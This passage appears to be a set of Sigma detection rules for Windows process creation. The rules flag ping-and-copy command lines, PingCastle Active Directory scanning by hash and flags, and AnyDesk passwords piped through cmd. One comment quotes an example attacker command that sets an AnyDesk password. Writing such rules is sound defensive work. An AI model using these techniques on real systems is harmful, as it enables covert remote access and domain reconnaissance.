author: X__Junior (Nextron Systems)
date: 2023-07-18
modified: 2024-03-06
tags:
- attack.stealth
- attack.t1070.004
logsource:
category: process_creation
product: windows
detection:
# Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277
selection_cmd:
- Image|endswith: '\cmd.exe'
- OriginalFileName: 'Cmd.Exe'
selection_action:
CommandLine|contains|all:
- 'ping' # Covers "ping" and "ping.exe"
- 'copy '
selection_cli_1:
CommandLine|contains|windash: ' -n ' # Count
selection_cli_2:
CommandLine|contains|windash: ' -y '
condition: all of selection_*
falsepositives:
- Unknown
level: medium
title: PUA - PingCastle Execution
id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c
related:
- id: b37998de-a70b-4f33-b219-ec36bf433dc0
type: derived
status: test
description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.
references:
- https://github.com/vletoux/pingcastle
- https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
- https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450
- https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680
- https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699
- https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8
- https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1
author: Nasreddine Bencherchali (Nextron Systems), frack113
date: 2024-01-11
tags:
- attack.reconnaissance
- attack.t1595
logsource:
category: process_creation
product: windows
detection:
selection:
- Hashes|contains:
# PingCastle.exe
- 'MD5=f741f25ac909ee434e50812d436c73ff'
- 'MD5=d40acbfc29ee24388262e3d8be16f622'
- 'MD5=01bb2c16fadb992fa66228cd02d45c60'
- 'MD5=9e1b18e62e42b5444fc55b51e640355b'
- 'MD5=b7f8fe33ac471b074ca9e630ba0c7e79'
- 'MD5=324579d717c9b9b8e71d0269d13f811f'
- 'MD5=63257a1ddaf83cfa43fe24a3bc06c207'
- 'MD5=049e85963826b059c9bac273bb9c82ab'
- 'MD5=ecb98b7b4d4427eb8221381154ff4cb2'
- 'MD5=faf87749ac790ec3a10dd069d10f9d63'
- 'MD5=f296dba5d21ad18e6990b1992aea8f83'
- 'MD5=93ba94355e794b6c6f98204cf39f7a11'
- 'MD5=a258ef593ac63155523a461ecc73bdba'
- 'MD5=97000eb5d1653f1140ee3f47186463c4'
- 'MD5=95eb317fbbe14a82bd9fdf31c48b8d93'
- 'MD5=32fe9f0d2630ac40ea29023920f20f49'
- 'MD5=a05930dde939cfd02677fc18bb2b7df5'
- 'MD5=124283924e86933ff9054a549d3a268b'
- 'MD5=ceda6909b8573fdeb0351c6920225686'
- 'MD5=60ce120040f2cd311c810ae6f6bbc182'
- 'MD5=2f10cdc5b09100a260703a28eadd0ceb'
- 'MD5=011d967028e797a4c16d547f7ba1463f'
- 'MD5=2da9152c0970500c697c1c9b4a9e0360'
- 'MD5=b5ba72034b8f44d431f55275bace9f8b'
- 'MD5=d6ed9101df0f24e27ff92ddab42dacca'
- 'MD5=3ed3cdb6d12aa1ac562ad185cdbf2d1d'
- 'MD5=5e083cd0143ae95a6cb79b68c07ca573'
- 'MD5=28caff93748cb84be70486e79f04c2df'
- 'MD5=9d4f12c30f9b500f896efd1800e4dd11'
- 'MD5=4586f7dd14271ad65a5fb696b393f4c0'
- 'MD5=86ba9dddbdf49215145b5bcd081d4011'
- 'MD5=9dce0a481343874ef9a36c9a825ef991'
- 'MD5=85890f62e231ad964b1fda7a674747ec'
- 'MD5=599be548da6441d7fe3e9a1bb8cb0833'
- 'MD5=9b0c7fd5763f66e9b8c7b457fce53f96'
- 'MD5=32d45718164205aec3e98e0223717d1d'
- 'MD5=6ff5f373ee7f794cd17db50704d00ddb'
- 'MD5=88efbdf41f0650f8f58a3053b0ca0459'
- 'MD5=ef915f61f861d1fb7cbde9afd2e7bd93'
- 'MD5=781fa16511a595757154b4304d2dd350'
- 'MD5=5018ec39be0e296f4fc8c8575bfa8486'
- 'MD5=f4a84d6f1caf0875b50135423d04139f'
- 'SHA1=9c1431801fa6342ed68f047842b9a11778fc669b'
- 'SHA1=c36c862f40dad78cb065197aad15fef690c262f2'
- 'SHA1=bc8e23faea8b3c537f268b3e81d05b937012272d'
- 'SHA1=12e0357658614ff60d480d1a6709be68a2e40c5f'
- 'SHA1=18b33ab5719966393d424a3edbfa8dec225d98fa'
- 'SHA1=f14c9633040897d375e3069fddc71e859f283778'
- 'SHA1=08041b426c9f112ad2061bf3c8c718e34739d4fc'
- 'SHA1=7be77c885d0c9a4af4cecc64d512987cf93ba937'
- 'SHA1=72dbb719b05f89d9d2dbdf186714caf7639daa36'
- 'SHA1=5b1498beb2cfb4d971e377801e7abce62c0e315b'
- 'SHA1=292629c6ab33bddf123d26328025e2d157d9e8fc'
- 'SHA1=be59e621e83a2d4c87b0e6c69a2d22f175408b11'
- 'SHA1=0250ce9a716ab8cca1c70a9de4cbc49a51934995'
- 'SHA1=607e1fa810c799735221a609af3bfc405728c02d'
- 'SHA1=ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3'
- 'SHA1=044cf5698a8e6b0aeba5acb56567f06366a9a70a'
- 'SHA1=ef2dea8c736d49607832986c6c2d6fdd68ba6491'
- 'SHA1=efffc2bfb8af2e3242233db9a7109b903fc3f178'
- 'SHA1=5a05d4320de9afbc84de8469dd02b3a109efb2d4'
- 'SHA1=a785d88cf8b862a420b9be793ee6a9616aa94c84'
- 'SHA1=5688d56cbaf0d934c4e37b112ba257e8fb63f4ea'
- 'SHA1=5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17'
- 'SHA1=81d67b3d70c4e855cb11a453cc32997517708362'
- 'SHA1=9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad'
- 'SHA1=09c6930d057f49c1c1e11cf9241fffc8c12df3a2'
- 'SHA1=e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92'
- 'SHA1=9e3c992415e390f9ada4d15c693b687f38a492d1'
- 'SHA1=3f34a5ee303d37916584c888c4928e1c1164f92a'
- 'SHA1=ea4c8c56a8f5c90a4c08366933e5fb2de611d0db'
- 'SHA1=3150f14508ee4cae19cf09083499d1cda8426540'
- 'SHA1=036ad9876fa552b1298c040e233d620ea44689c6'
- 'SHA1=3a3c1dcb146bb4616904157344ce1a82cd173bf5'
- 'SHA1=6230d6fca973fa26188dfbadede57afb4c15f75c'
- 'SHA1=8f7b2a9b8842f339b1e33602b7f926ab65de1a4d'
- 'SHA1=a586bb06b59a4736a47abff8423a54fe8e2c05c4'
- 'SHA1=c82152cddf9e5df49094686531872ecd545976db'
- 'SHA1=04c39ffc18533100aaa4f9c06baf2c719ac94a61'
- 'SHA1=e082affa5cdb2d46452c6601a9e85acb8446b836'
- 'SHA1=a075bfb6cf5c6451ce682197a87277c8bc188719'
- 'SHA1=34c0c5839af1c92bce7562b91418443a2044c90d'
- 'SHA1=74e10a9989e0ec8fe075537ac802bd3031ae7e08'
- 'SHA1=3a515551814775df0ccbe09f219bc972eae45a10'
- 'SHA256=90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b'
- 'SHA256=5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85'
- 'SHA256=e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03'
- 'SHA256=9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795'
- 'SHA256=7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f'
- 'SHA256=9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a'
- 'SHA256=c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275'
- 'SHA256=1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b'
- 'SHA256=768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2'
- 'SHA256=1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae'
- 'SHA256=606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6'
- 'SHA256=b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a'
- 'SHA256=ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1'
- 'SHA256=9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559'
- 'SHA256=c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2'
- 'SHA256=a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef'
- 'SHA256=84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d'
- 'SHA256=c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524'
- 'SHA256=01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b'
- 'SHA256=9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b'
- 'SHA256=63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629'
- 'SHA256=2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358'
- 'SHA256=7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca'
- 'SHA256=e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea'
- 'SHA256=dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172'
- 'SHA256=dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4'
- 'SHA256=8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2'
- 'SHA256=5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66'
- 'SHA256=e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27'
- 'SHA256=75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41'
- 'SHA256=56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1'
- 'SHA256=f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0'
- 'SHA256=845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8'
- 'SHA256=9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d'
- 'SHA256=5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726'
- 'SHA256=37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90'
- 'SHA256=ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5'
- 'SHA256=3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140'
- 'SHA256=d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87'
- 'SHA256=63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892'
- 'SHA256=47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054'
- 'SHA256=7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd'
- Image|endswith: '\PingCastle.exe'
- OriginalFileName: PingCastle.exe
- Product: 'Ping Castle'
- CommandLine|contains:
- '--scanner aclcheck'
- '--scanner antivirus'
- '--scanner computerversion'
- '--scanner foreignusers'
- '--scanner laps_bitlocker'
- '--scanner localadmin'
- '--scanner nullsession'
- '--scanner nullsession-trust'
- '--scanner oxidbindings'
- '--scanner remote'
- '--scanner share'
- '--scanner smb'
- '--scanner smb3querynetwork'
- '--scanner spooler'
- '--scanner startup'
- '--scanner zerologon'
- CommandLine|contains: '--no-enum-limit'
- CommandLine|contains|all:
- '--healthcheck'
- '--level Full'
- CommandLine|contains|all:
- '--healthcheck'
- '--server '
condition: selection
falsepositives:
- Unknown
# Note: As this is a PUA the level may vary depending on your environment. Reduce or increase the level as you see fit
level: medium
title: Remote Access Tool - AnyDesk Piped Password Via CLI
id: b1377339-fda6-477a-b455-ac0923f9ec2c
status: test
description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.
references:
- https://redcanary.com/blog/misbehaving-rats/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-28
modified: 2023-03-05
tags:
- attack.command-and-control
- attack.t1219.002
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
# Example: C:\WINDOWS\system32\cmd.exe /C cmd.exe /c echo J9kzQ2Y0qO |C:\ProgramData\anydesk.exe --set-password
- '/c '
- 'echo '
- '.exe --set-password'
condition: selection
falsepositives:
- Legitimate piping of the password to anydesk
- Some FP could occur with similar tools that uses the same command line '--set-password'
level: medium